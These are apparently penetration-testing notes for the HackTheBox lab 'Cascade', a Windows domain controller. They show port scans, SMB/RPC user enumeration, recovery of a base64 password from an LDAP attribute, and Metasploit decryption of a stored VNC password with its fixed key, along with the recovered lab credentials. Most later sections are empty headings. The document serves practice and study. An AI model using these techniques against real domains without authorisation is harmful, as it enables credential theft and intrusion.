HackTheBox · Lab
Cascade
NOTES
ENUMERATION
NMAP
```shell
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
```
SMB anon auth success
RPCCLIENT
```shell
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $> getdompwinfo
min_password_length: 5
```
WINDAPSEARCH gave
```shell
windapsearch.py -U --full --dc-ip $IP | tee outputs/windapsearch.full
userPrincipalName: r.thompson@cascade.local
....SNIP....
cascadeLegacyPwd: clk0bjVldmE=
```
```shell
echo "clk0bjVldmE=" | base64 -d
rY4n5eva
```
TempAdmin:(password is the same as the normal admin account password)
FOOTHOLD
```shell
msf6 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
>> key = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\x17Rk\x06#NX\a"
>> require 'rex/proto/rfb'
=> false
>> require 'rex/proto/rfb'
=> false
>> require 'rex/proto/rfb'
=> false
>> Rex::Proto::RFB::Cipher.decrypt(["6BCF2A4B6E5ACA0F"].pack('H*'), key)
=> "sT333ve2"
>>
```
sT333ve2
c4scadek3y654321
w3lc0meFr31nd
PRIVILEGE ESCALATION
SYSTEM OWNAGE
CLEANUP
WEB SERVICE TECHNOLOGY
WEB
NIKTO
WFUZZ / GOBUSTER
FILES
DIRS
SUBDIRS
VHOSTS
SCOPE
| IP | HOSTNAME | DOMAIN NAME | OS |
|---|---|---|---|
| 10.10.10.182 | CASC-DC1 | cascade.local | |
USERS
CREDENTIALS
```shell
r.thompson:rY4n5eva
```